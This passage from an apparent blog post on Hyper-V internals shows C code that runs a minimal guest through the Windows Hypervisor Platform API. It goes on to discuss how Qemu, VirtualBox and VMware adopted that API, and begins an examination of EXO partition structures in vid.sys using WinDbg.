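    /* 1. Partition: create, set the VP count, set up (properties are frozen after setup). */
    WHV_PARTITION_HANDLE part; WHV_PARTITION_PROPERTY prop;
    memset(&prop, 0, sizeof(prop)); prop.ProcessorCount = 1;
    CHECK(WHvCreatePartition(&part));
    CHECK(WHvSetPartitionProperty(part, WHvPartitionPropertyCodeProcessorCount, &prop, sizeof(prop)));
    CHECK(WHvSetupPartition(part));
    /* 2. Memory: one host page backs GPA 0x0-0xFFF of the partition (RWX). */
    void *page = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!page) return -1;
    memcpy(page, guest_code, sizeof(guest_code));
    CHECK(WHvMapGpaRange(part, page, 0, 0x1000,
          WHvMapGpaRangeFlagRead | WHvMapGpaRangeFlagWrite | WHvMapGpaRangeFlagExecute));
    /* 3. VP: created in x86 reset state (CS=F000:FFF0); point it at GPA 0 instead. */
    CHECK(WHvCreateVirtualProcessor(part, 0, 0));
    WHV_REGISTER_NAME  names[3] = { WHvX64RegisterCs, WHvX64RegisterRip, WHvX64RegisterRflags };
    WHV_REGISTER_VALUE vals[3]; memset(vals, 0, sizeof(vals));
    vals[0].Segment.Limit = 0xFFFF;     /* CS: base 0, selector 0 */
    vals[0].Segment.Attributes = 0x9B;  /* present, DPL 0, code, execute/read, accessed */
    vals[2].Reg64 = 0x2;                /* RIP = 0, RFLAGS = reserved bit 1 only */
    CHECK(WHvSetVirtualProcessorRegisters(part, 0, names, 3, vals));
    /* Run loop: hand every exit to the platform-neutral emulator, then resume. */
    for (;;) {
        WHV_RUN_VP_EXIT_CONTEXT ctx; struct vm_exit e; memset(&e, 0, sizeof(e));
        CHECK(WHvRunVirtualProcessor(part, 0, &ctx, sizeof(ctx)));
        e.kind = EXIT_OTHER; e.rip = ctx.VpContext.Rip; e.insn_len = ctx.VpContext.InstructionLength;
        if (ctx.ExitReason == WHvRunVpExitReasonX64Halt) e.kind = EXIT_HALT;
        if (ctx.ExitReason == WHvRunVpExitReasonX64IoPortAccess && ctx.IoPortAccess.AccessInfo.IsWrite) {
            e.kind = EXIT_IO_WRITE; e.port = ctx.IoPortAccess.PortNumber; e.value = (uint8_t)ctx.IoPortAccess.Rax;
        }
        int resume = vmm_handle_exit(s, &e);
        WHV_REGISTER_NAME rn = WHvX64RegisterRip;
        WHV_REGISTER_VALUE rv; memset(&rv, 0, sizeof(rv)); rv.Reg64 = s->next_rip;
        CHECK(WHvSetVirtualProcessorRegisters(part, 0, &rn, 1, &rv));
        if (!resume) break;
    }
    WHvDeleteVirtualProcessor(part, 0); WHvDeletePartition(part);
    return 0;
}

int main(void)
{
    struct vmm_state s; memset(&s, 0, sizeof(s));
    if (run_whvp_guest(&s) != 0) return 1;
    printf("guest wrote 0x%02X to port 0x%04X, then halted\n", s.last_value, s.last_port); return 0;
}
#endif
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Two details are easy to get wrong. A freshly created VP starts at the x86 reset vector (CS base 0xFFFF0000, RIP 0xFFF0), so CS and RIP must be set before the first WHvRunVirtualProcessor call. And after every trapped instruction it is the VMM, not the hypervisor, that advances RIP by VpContext.InstructionLength; forget it and the guest re-executes the OUT forever. Because an EXO-partition has no BIOS, no devices and no memory beyond what WHvMapGpaRange has mapped, any access to an unmapped GPA comes back as WHvRunVpExitReasonMemoryAccess, which the handler above treats as a stop condition.</span></div>
</div>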
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These APIs have been available in Windows 10 since build 1803 (April 2018 Update): almost 2.5 years passed between the development of VBS, with the realization that the technology blocks third-party virtualization applications, and their appearance.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, in the context of these APIs, the term Windows Hypervisor Platform (WHPX) is used: it is the Windows component whose activation makes the specified APIs available. The “X” seems to stand for execution (by analogy with HAXM, the Intel Hardware Accelerated Execution Manager, probably because the API was first tested on Qemu) or simply for the word “accelerator”. </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 21.3pt; margin-top: 0pt; text-indent: 14.099999999999998pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="282" src="https://lh5.googleusercontent.com/HA53WssQOqqijrfsCSCaXiqDBK5xDuvkgzEH2JHN669k-CB5H8zV2WbUk-CuJK0eGj0aGkKUoypbJ7vGWsqXkDAjaZKuC8ZGtfN_sup-XaVhWzhq_iw8sb96E8u65MbCUOAJ8SsePf1CIq_MsA" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For Full VMs and containers such as Windows Sandbox, WDAG or the Microsoft Emulator (used to run virtual images with Windows 10X), the standard Microsoft APIs exported by vid.dll are used.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Qemu is the first emulator for which Microsoft itself developed a WHPX acceleration module, demonstrating that its APIs are functional.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the Oracle VirtualBox developers adapted their solution so that it worked alongside Hyper-V in Windows version 1809, but after a while it broke (Microsoft blocked the execution of some vid.sys driver functions for partitions created with the WHVP API).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In January 2020, VMware announced a VMware Workstation 20H1 preview build that worked in conjunction with Hyper-V, but its performance was quite low. On May 28, 2020, version 15.5 was released with support for running while Hyper-V is enabled in the host OS. It is worth mentioning that VMware significantly redesigned VMware Workstation for integration with the WHVP API:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 21.3pt; margin-top: 0pt; text-indent: 14.099999999999998pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="137" src="https://lh5.googleusercontent.com/87Dg8YQSve08IDa1f_GUj1SyNgClxYngHen-iaOE7UUxsd3JIvDHBhRnyVq2jo9vaMoSHK6ALXwUEi_kExNX3jqayEPLyycCiUb8gbt15npH6uzXh0Vc_y7Lr6W7c_Y3F6t7lbwKpOyOfjGSbA" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the same time, nested virtualization support was lost when Hyper-V is enabled in the root OS. Recall that VMware was one of the first companies to add nested virtualization to its software (it appeared in VMware Workstation 8 in 2011). There is no information yet on when nested virtualization will be available with Hyper-V enabled in the root OS. At the time of publication there are discussions about a rather large decrease in VMware performance when the WHVP API is used, but I hope this problem will be solved. And don’t forget that VMware and VirtualBox are essentially competing solutions to Windows Sandbox\WSL\Hyper-V in Windows 10.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The WHVP API is currently used in:</span><br />
<ul style="text-align: left;">
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Android emulator from Google: <a href="https://docs.microsoft.com/ru-ru/xamarin/android/get-started/installation/android-emulator/hardware-acceleration?pivots=windows">https://docs.microsoft.com/ru-ru/xamarin/android/get-started/installation/android-emulator/hardware-acceleration?pivots=windows</a>, <a href="https://developer.android.com/studio/run/emulator-acceleration#vm-windows-whpx">https://developer.android.com/studio/run/emulator-acceleration#vm-windows-whpx</a>;</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Applepie, a hypervisor for fuzzing built with WHVP and Bochs: <a href="https://github.com/gamozolabs/applepie/tree/master/whvp_bindings">https://github.com/gamozolabs/applepie/tree/master/whvp_bindings</a>;</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Qemu;</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VirtualBox 6.xx (partially);</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VMware Workstation 15.5 (and 20H2 Preview).</span></span></li>
</ul>
</div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VirtualBox has had problems since the Windows 10 1903 release, and (as we will see below) it no longer uses part of the WHVP API, replacing it with its own mechanism, because the WHVP API is designed only for user mode. VirtualBox still can’t fully use it because of the kernel-mode components it relies on during operation. VMware had to do a lot of work and lose some functionality, and there are performance complaints.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In fact, we can say that the API can be used effectively only from user mode (Qemu, Bochs).</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Microsoft’s defense, I can say that the API exported by vid.dll changes every six months, when a new version of Windows is released, and sometimes even with the monthly cumulative updates. Below is the list of functions exported by vid.dll depending on the Windows version. As you can see, the list of changes is significant, especially for Windows Server versions, and we can only guess at how the function parameters changed. For third-party developers, this kind of change is unacceptable in any case.</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: left;">
<span style="border: none; display: inline-block;"><img height="640" src="https://lh5.googleusercontent.com/Qt9JLieWdVJJsWcXnrBTcotwO3TvCkMj6S3R8t2yKG2zNLp6tZM23Nh5jH3EbZE8hL3W7zE0MDwvmGgi-Dm2RrPgGic-a84hd14cUf5V4fYXFj19a8c7IK6cBIkq9rkrtLla5s-g-ka2d2t1Xg" style="margin-left: 0px; margin-top: 0px;" width="336" /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="border: none; display: inline-block;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh3.googleusercontent.com/TU_h_WmqGPzeY-deJxPiDJXEnP277Mb9GUuQpmtQl-1R6baAJXc9j4BLOuXAzcYft4zeZIpPmh2qlXHy2pxjb41uWzL5tyRIW078_doyyL6EszmNGwSucAXOGXyLAodlhQoDFlMfypMqkw5ZBg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://lh3.googleusercontent.com/TU_h_WmqGPzeY-deJxPiDJXEnP277Mb9GUuQpmtQl-1R6baAJXc9j4BLOuXAzcYft4zeZIpPmh2qlXHy2pxjb41uWzL5tyRIW078_doyyL6EszmNGwSucAXOGXyLAodlhQoDFlMfypMqkw5ZBg" style="margin-top: 0px;" width="427" /></a><span style="border: none; display: inline-block;"></span></div>
</div>
</div>
<div style="text-align: left;">
<br /></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><span style="font-size: 8pt; text-indent: 28.35pt;">The situation with the WHVP API is much more stable, which is to be expected for a public API:</span></span></span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><span style="font-size: 8pt; text-indent: 28.35pt;"><br /></span></span></span></div>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh3.googleusercontent.com/7N0EY0-BTLLsdL4b6ZLb8XQbDy-oO8pYm5M8uHsDLjRVog9MthazUkFNVrgwg80tMqjkLx_OIHC9FdSMm1AJhfFu2sPuNDRWfv-aeRT2W9Yd8LzmLA0SsRK7njL5Qu8tAUxHBEnCdH4qR2xI0A" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://lh3.googleusercontent.com/7N0EY0-BTLLsdL4b6ZLb8XQbDy-oO8pYm5M8uHsDLjRVog9MthazUkFNVrgwg80tMqjkLx_OIHC9FdSMm1AJhfFu2sPuNDRWfv-aeRT2W9Yd8LzmLA0SsRK7njL5Qu8tAUxHBEnCdH4qR2xI0A" style="margin-top: 0px;" width="600" /></a></div>
<b style="font-weight: normal;"><br /></b>
</div>
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, the situation for low-level developers working with Hyper-V is rather complicated and, moreover, it is getting worse. Even the Hyper-V TLFS is updated extremely rarely: the latest update added a description of nested virtualization, but the information is extremely scarce. It does let you read the internal structures of the hypervisor, which I did at one time with the LiveCloudKd utility (</span><a href="https://github.com/gerhart01/LiveCloudKd" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), but so far that is usable only for research purposes; putting it into practice and integrating it into, for example, a debugger still doesn’t work.</span></div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But, as Satya Nadella said (</span><a href="https://content.techgig.com/windows-is-no-longer-important-hints-microsoft-ceo/articleshow/71474383.cms" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://content.techgig.com/windows-is-no-longer-important-hints-microsoft-ceo/articleshow/71474383.cms</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), the Windows era is passing and everyone should move to the cloud, so there is no chance that the situation with low-level APIs will change for the better.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's leave the theory aside and proceed to the practical part.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EXO partitions memory internals</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 x64 Enterprise 20H1 (2004) and Windows 10 x64 Enterprise 1803 (its lifecycle ends in November 2020, so its information is provided only for comparison), both with updates as of June 2020, were used as root OSes. Windows 10 x64 Enterprise 20H1 (2004) was used everywhere as the guest OS.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are 3 headers in the Windows SDK 10.0.19041 (Windows 10 20H1 SDK):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPlatform.h</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPlatformDefs.h</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEmulation.h</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The functions are exported by the winhvplatform.dll library and their definitions are in the WinHvPlatform.h header file. They are wrappers over procedures provided by vid.dll (Microsoft Hyper-V Virtualization Infrastructure Driver Library), which in turn calls the services of the vid.sys driver (Microsoft Hyper-V Virtualization Infrastructure Driver).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let’s briefly consider what happens when a VM starts. The Qemu source code is available, so anyone interested can study the working algorithms in detail:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<a href="https://github.com/qemu/qemu/blob/master/target/i386/whpx-all.c" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/qemu/qemu/blob/master/target/i386/whpx-all.c</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-indent: 28.35pt;">When Qemu starts in WHPX hardware acceleration mode, two handles to \Device\VidExo are created. They give access to the kernel-mode vid.sys device mentioned above:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="113" src="https://lh3.googleusercontent.com/gQ5CBRwkjjKMSBn2loHadGuLjiUYxzCIIOgm-jDkg6phwfZ8oh5KcH3RRrZUyq3eX8NfSHZIiQLip78gT3n7YcGqh31aOxNq68p2yhh-1OyEIKIBYwgVtegaA9wmWg9hh2gtXX6AFvnDHUnpNQ" style="margin-left: 0px; margin-top: 0px;" width="444" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Both handles are file objects:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="183" src="https://lh5.googleusercontent.com/tHybLRYe7ojbyfTjy0e-1mxuhqLNjQCdyI1IcWXm4T3mOWeTI0YWZXGkvyEoBGcO65rZIDXA27FvVrSPPvsvLEoG5i78_qAYc0bD4YDFT2jv6dUYwvzUZFOWVKkQXfw8zVqpb91L5uSD-XW1KA" style="margin-left: 0px; margin-top: 0px;" width="203" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Looking at each FsContext, we find two different data structures, with the signatures Exo and Prtn.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="156" src="https://lh6.googleusercontent.com/3ULBuhJnnc9JhQqxPP3LbgUWUoViKGd5CjmACGoSASmcuNehko7Vvd_stpwrks9LW6vV9j0_SiRpI_BZCV9JIBvzWUhcoiiPLRKutWgDPcOFDrTXe2-cwX6z9c0Gt6hwqXoNxWvGGl9FIj_eNA" style="margin-left: 0px; margin-top: 0px;" width="276" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Prtn structure (VM_PROCESS_CONTEXT) was described in the previous article (</span><a href="http://hvinternals.blogspot.com/2019/09/hyper-v-memory-internals-guest-os-memory-access.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2019/09/hyper-v-memory-internals-guest-os-memory-access.html</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using WinDbg and the pykd plugin, this structure can be parsed and its meaningful elements shown (example for VMware Workstation 20H2 Preview):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="472" src="https://lh6.googleusercontent.com/6KB1iRIhJXirG2AVQCd3jTa-bic1McTF0CtU3XgoH_48GstTy8qIVAhWpnSbpBoKK--p72-x9HSp-1_tkCEekDJqP57MfHJ8yk9PaZ6i1tjLycF35kDIGvhjlIK-qbQaU-7rMUJ51G5hyzVByw" style="margin-left: 0px; margin-top: 0px;" width="537" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, the Exo object is not registered in the winhvr!WinHvpPartitionArray array (only one Prtn object is present), i.e. it is not a full partition object.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
